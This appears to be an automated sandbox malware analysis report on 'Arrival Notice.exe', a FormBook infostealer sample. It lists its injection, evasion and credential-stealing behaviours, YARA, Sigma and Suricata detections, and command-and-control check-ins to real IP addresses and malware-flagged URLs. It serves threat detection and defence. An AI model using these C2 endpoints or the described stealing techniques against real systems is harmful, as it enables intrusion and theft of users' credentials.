Edit tour

Windows Analysis Report
Arrival Notice.exe

Overview

General Information

Sample name:	Arrival Notice.exe
Analysis ID:	1554175
MD5:	3528850c6e60cab0b4e685182f02722c
SHA1:	27254508e6635119da9b23a59b07954c5ca5ceba
SHA256:	731d3d5a956febeb3d9f0d08c062b22e043a7b5b325ecaceec5db490bf59f185
Tags:	exeuser-abuse_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Arrival Notice.exe (PID: 3848 cmdline: "C:\Users\user\Desktop\Arrival Notice.exe" MD5: 3528850C6E60CAB0B4E685182F02722C)

svchost.exe (PID: 5520 cmdline: "C:\Users\user\Desktop\Arrival Notice.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

fXkDwRWxFFQGfp.exe (PID: 5200 cmdline: "C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

find.exe (PID: 2664 cmdline: "C:\Windows\SysWOW64\find.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)

fXkDwRWxFFQGfp.exe (PID: 5364 cmdline: "C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 2384 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000A.00000002.3746964118.0000000002540000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.1492845743.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3754741570.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.3757179262.00000000054F0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.1493958694.0000000003530000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3754536701.0000000002C70000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.1494766146.0000000003C50000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.3754584552.0000000002C30000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
7.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Arrival Notice.exe", CommandLine: "C:\Users\user\Desktop\Arrival Notice.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Arrival Notice.exe", ParentImage: C:\Users\user\Desktop\Arrival Notice.exe, ParentProcessId: 3848, ParentProcessName: Arrival Notice.exe, ProcessCommandLine: "C:\Users\user\Desktop\Arrival Notice.exe", ProcessId: 5520, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\Arrival Notice.exe", CommandLine: "C:\Users\user\Desktop\Arrival Notice.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Arrival Notice.exe", ParentImage: C:\Users\user\Desktop\Arrival Notice.exe, ParentProcessId: 3848, ParentProcessName: Arrival Notice.exe, ProcessCommandLine: "C:\Users\user\Desktop\Arrival Notice.exe", ProcessId: 5520, ProcessName: svchost.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T07:54:34.556282+0100	2022930	1	A Network Trojan was detected	52.149.20.212	443	192.168.2.7	49744	TCP
2024-11-12T07:55:13.700009+0100	2022930	1	A Network Trojan was detected	52.149.20.212	443	192.168.2.7	49951	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T07:54:52.798578+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49842	206.119.185.141	80	TCP
2024-11-12T07:55:16.531108+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49970	199.59.243.227	80	TCP
2024-11-12T07:55:30.041123+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49978	66.29.146.173	80	TCP
2024-11-12T07:55:43.699906+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49982	209.74.64.58	80	TCP
2024-11-12T07:55:57.558872+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49986	85.159.66.93	80	TCP
2024-11-12T07:56:13.988282+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49990	20.2.208.137	80	TCP
2024-11-12T07:56:27.509078+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49994	13.248.169.48	80	TCP
2024-11-12T07:56:40.805148+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49998	96.126.123.244	80	TCP
2024-11-12T07:56:54.126723+0100	2855465	1	A Network Trojan was detected	192.168.2.7	50002	3.33.130.190	80	TCP
2024-11-12T07:57:08.069276+0100	2855465	1	A Network Trojan was detected	192.168.2.7	50006	104.21.69.93	80	TCP
2024-11-12T07:57:22.281581+0100	2855465	1	A Network Trojan was detected	192.168.2.7	50010	172.67.221.220	80	TCP
2024-11-12T07:57:35.911493+0100	2855465	1	A Network Trojan was detected	192.168.2.7	50014	91.184.0.200	80	TCP
2024-11-12T07:57:49.604746+0100	2855465	1	A Network Trojan was detected	192.168.2.7	50018	217.160.0.60	80	TCP
2024-11-12T07:58:04.763096+0100	2855465	1	A Network Trojan was detected	192.168.2.7	50022	161.97.142.144	80	TCP
2024-11-12T07:58:18.771726+0100	2855465	1	A Network Trojan was detected	192.168.2.7	50026	144.76.190.39	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T07:55:08.918565+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49929	199.59.243.227	80	TCP
2024-11-12T07:55:11.434947+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49940	199.59.243.227	80	TCP
2024-11-12T07:55:13.983322+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49957	199.59.243.227	80	TCP
2024-11-12T07:55:22.274590+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49975	66.29.146.173	80	TCP
2024-11-12T07:55:24.852644+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49976	66.29.146.173	80	TCP
2024-11-12T07:55:27.361207+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49977	66.29.146.173	80	TCP
2024-11-12T07:55:36.050838+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49979	209.74.64.58	80	TCP
2024-11-12T07:55:38.603170+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49980	209.74.64.58	80	TCP
2024-11-12T07:55:41.177007+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49981	209.74.64.58	80	TCP
2024-11-12T07:55:50.395829+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49983	85.159.66.93	80	TCP
2024-11-12T07:55:52.943858+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49984	85.159.66.93	80	TCP
2024-11-12T07:55:55.504331+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49985	85.159.66.93	80	TCP
2024-11-12T07:56:06.206544+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49987	20.2.208.137	80	TCP
2024-11-12T07:56:08.816029+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49988	20.2.208.137	80	TCP
2024-11-12T07:56:11.503533+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49989	20.2.208.137	80	TCP
2024-11-12T07:56:19.874501+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49991	13.248.169.48	80	TCP
2024-11-12T07:56:22.420545+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49992	13.248.169.48	80	TCP
2024-11-12T07:56:24.924597+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49993	13.248.169.48	80	TCP
2024-11-12T07:56:33.171852+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49995	96.126.123.244	80	TCP
2024-11-12T07:56:35.734292+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49996	96.126.123.244	80	TCP
2024-11-12T07:56:38.275804+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49997	96.126.123.244	80	TCP
2024-11-12T07:56:46.477057+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49999	3.33.130.190	80	TCP
2024-11-12T07:56:49.031344+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50000	3.33.130.190	80	TCP
2024-11-12T07:56:51.577208+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50001	3.33.130.190	80	TCP
2024-11-12T07:57:00.227753+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50003	104.21.69.93	80	TCP
2024-11-12T07:57:02.796114+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50004	104.21.69.93	80	TCP
2024-11-12T07:57:05.392125+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50005	104.21.69.93	80	TCP
2024-11-12T07:57:14.274613+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50007	172.67.221.220	80	TCP
2024-11-12T07:57:16.873749+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50008	172.67.221.220	80	TCP
2024-11-12T07:57:19.407623+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50009	172.67.221.220	80	TCP
2024-11-12T07:57:28.317647+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50011	91.184.0.200	80	TCP
2024-11-12T07:57:30.869209+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50012	91.184.0.200	80	TCP
2024-11-12T07:57:33.384394+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50013	91.184.0.200	80	TCP
2024-11-12T07:57:41.918713+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50015	217.160.0.60	80	TCP
2024-11-12T07:57:44.474328+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50016	217.160.0.60	80	TCP
2024-11-12T07:57:47.693140+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50017	217.160.0.60	80	TCP
2024-11-12T07:57:56.063684+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50019	161.97.142.144	80	TCP
2024-11-12T07:57:58.407567+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50020	161.97.142.144	80	TCP
2024-11-12T07:58:01.078624+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50021	161.97.142.144	80	TCP
2024-11-12T07:58:11.200700+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50023	144.76.190.39	80	TCP
2024-11-12T07:58:13.662219+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50024	144.76.190.39	80	TCP
2024-11-12T07:58:16.209174+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50025	144.76.190.39	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Arrival Notice.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.megaweb8.top/9tmz/	Avira URL Cloud: Label: malware
Source: http://www.megaweb8.top/9tmz/?KjH=KRIxdVHP60TD8&m2gpQ=NV1tTcsqNp6kYU/NXIxVbRYgayRVnArU9EiSb08h70XbT7GakAVreBKCJMPRzvHbWdCzhb2rvOXrdRlLN/AVokaQeP6tHquK0CCjiZSviNcmDdeyv9j5LfcBhXqGhSsmGfBUz+LOACLV	Avira URL Cloud: Label: malware
Source: http://www.vnxoso88.art/sciu/	Avira URL Cloud: Label: malware
Source: http://www.vnxoso88.art/sciu/?m2gpQ=YIkuFVuW2E28e4WkTeJVCzzknQiQ0fQ5lFYo7Kt/9G+eExaeK9iNv/1DyEL0uQ9QqookS/lhd7RPtmaZyJokLYniVjhicuG4fHS3nSlILxZzvAKFwxHmhkRjxK9ClG7JmJxrzRt3MvPo&KjH=KRIxdVHP60TD8	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: Arrival Notice.exe	ReversingLabs: Detection: 34%
Source: Arrival Notice.exe	Virustotal: Detection: 41%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3746964118.0000000002540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1492845743.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3754741570.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3757179262.00000000054F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1493958694.0000000003530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3754536701.0000000002C70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1494766146.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3754584552.0000000002C30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Arrival Notice.exe

Joe Sandbox ML: detected

Source: Arrival Notice.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: find.pdb source: svchost.exe, 00000007.00000002.1493476762.0000000003012000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1493447032.0000000003000000.00000004.00000020.00020000.00000000.sdmp, fXkDwRWxFFQGfp.exe, 00000009.00000002.3753336161.00000000010A8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fXkDwRWxFFQGfp.exe, 00000009.00000000.1414853065.0000000000E7E000.00000002.00000001.01000000.00000005.sdmp, fXkDwRWxFFQGfp.exe, 0000000C.00000000.1572655252.0000000000E7E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: Arrival Notice.exe, 00000000.00000003.1273175330.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, Arrival Notice.exe, 00000000.00000003.1274823990.0000000004000000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1388765601.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1494088973.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1494088973.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1386878848.0000000003400000.00000004.00000020.00020000.00000000.sdmp, find.exe, 0000000A.00000003.1494032634.0000000002B71000.00000004.00000020.00020000.00000000.sdmp, find.exe, 0000000A.00000002.3755131418.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, find.exe, 0000000A.00000002.3755131418.000000000307E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 0000000A.00000003.1496380330.0000000002D2C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Arrival Notice.exe, 00000000.00000003.1273175330.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, Arrival Notice.exe, 00000000.00000003.1274823990.0000000004000000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000003.1388765601.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1494088973.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1494088973.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1386878848.0000000003400000.00000004.00000020.00020000.00000000.sdmp, find.exe, find.exe, 0000000A.00000003.1494032634.0000000002B71000.00000004.00000020.00020000.00000000.sdmp, find.exe, 0000000A.00000002.3755131418.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, find.exe, 0000000A.00000002.3755131418.000000000307E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 0000000A.00000003.1496380330.0000000002D2C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: find.pdbGCTL source: svchost.exe, 00000007.00000002.1493476762.0000000003012000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1493447032.0000000003000000.00000004.00000020.00020000.00000000.sdmp, fXkDwRWxFFQGfp.exe, 00000009.00000002.3753336161.00000000010A8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: find.exe, 0000000A.00000002.3755675493.000000000350C000.00000004.10000000.00040000.00000000.sdmp, find.exe, 0000000A.00000002.3749879419.0000000002A40000.00000004.00000020.00020000.00000000.sdmp, fXkDwRWxFFQGfp.exe, 0000000C.00000002.3755365047.00000000030BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1808863926.000000001AD4C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: find.exe, 0000000A.00000002.3755675493.000000000350C000.00000004.10000000.00040000.00000000.sdmp, find.exe, 0000000A.00000002.3749879419.0000000002A40000.00000004.00000020.00020000.00000000.sdmp, fXkDwRWxFFQGfp.exe, 0000000C.00000002.3755365047.00000000030BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1808863926.000000001AD4C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_004339B6
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00452492
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00442886
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_004788BD
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,	0_2_0045CAFA
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00431A86
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,	0_2_0044BD27
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_0045DE8F FindFirstFileW,FindClose,	0_2_0045DE8F
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0044BF8B
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_0255C620 FindFirstFileW,FindNextFileW,FindClose,	10_2_0255C620

Source: C:\Windows\SysWOW64\find.exe	Code function: 4x nop then xor eax, eax		10_2_02549D40
Source: C:\Windows\SysWOW64\find.exe	Code function: 4x nop then mov ebx, 00000004h		10_2_02DB04DE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49842 -> 206.119.185.141:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49929 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49940 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49970 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49976 -> 66.29.146.173:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49986 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49982 -> 209.74.64.58:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49975 -> 66.29.146.173:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49994 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49980 -> 209.74.64.58:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49991 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50002 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49988 -> 20.2.208.137:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49990 -> 20.2.208.137:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50001 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49999 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49978 -> 66.29.146.173:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49993 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49957 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49989 -> 20.2.208.137:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50004 -> 104.21.69.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50005 -> 104.21.69.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50003 -> 104.21.69.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50015 -> 217.160.0.60:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50022 -> 161.97.142.144:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50013 -> 91.184.0.200:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50021 -> 161.97.142.144:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49981 -> 209.74.64.58:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50016 -> 217.160.0.60:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50012 -> 91.184.0.200:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50006 -> 104.21.69.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49997 -> 96.126.123.244:80
